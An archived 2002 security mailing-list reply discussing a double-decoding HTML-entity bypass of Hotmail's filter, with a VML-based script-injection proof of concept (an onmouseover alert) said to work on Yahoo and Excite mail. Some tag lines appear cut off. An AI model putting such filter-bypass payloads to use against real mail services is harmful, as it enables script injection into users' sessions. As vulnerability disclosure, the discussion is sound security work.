Re: double decoding filter bypass (Hotmail) + challenge for you

From: http-equivat_private
Date: Wed Jul 17 2002 - 16:16:35 PDT

  • Next message: Michel Arboi: "Re: Badware update through P2P?"

    <!-- So what about Hotmail ? Well, where can we put unicode in an 
    html message ? Into an url as %xx, yep, but that's not the point 
    here. There is a thing called "html entities" : you can replace *any* 
    printable character by its ascii/unicode value in the values of the 
    parameters of html tags, for instance in the parameters of the STYLE 
    tag (hint !).  "A" is &#x41, "B" is &#x42, etc.
    >What the hotmail filter did is replacing any html entity by its 
    corresponding character, then trying to filter out any bad string 
    (forbidden keywords), THEN giving the output to the user, without re-
    applying the filter on this output. But, if there are still html 
    entities into this output, the user's browser will interpret them, 
    that will possibly give birth to some interesting forbidden 
    keywords... and fire a script.-->
    Here's another one for you FozZY:
    <HTML xmlns:v = "urn:schemas-microsoft-com:vml">
    <STYLE>v\:* {BEHAVIOR: url(#default#VML)}</STYLE>
    style="LEFT: 50px; WIDTH: 300px; POSITION: relative; TOP: 30px; 
    HEIGHT: 200px" 
    src = 
    where fooness.vml#malware is:
       <xml xmlns:v = "urn:schemas-microsoft-com:vml">
     <v:rect id="malware"  fillcolor="green" 
    onmouseover="alert('malware was here')">
    1. This works on Yahoo and Excite, probably others
    2. Quick fiddling suggests only mouseover works
    3. Hotmail only filters this:
    <HTML xmlns:v = "urn:schemas-microsoft-com:vml">
    <STYLE>v\:* {BEHAVIOR: url(#default#VML)}</STYLE>
    which is absolutely required. Probably easier to mask than 
    say "Javascript"
    note 1/: can't recall, Hotmail may not allow for retrieval of files 
    remotely, or base64 encodes them on the Hotmail server if there are 
    any. If so, you can embed and CID: the fooness.vml
    note /2: the above may also work in IE dependent mail clients 
    note /3: doesn't want to work in Outlook Express with scripting off 
    even though the frame aspect works - which is patched in OE6

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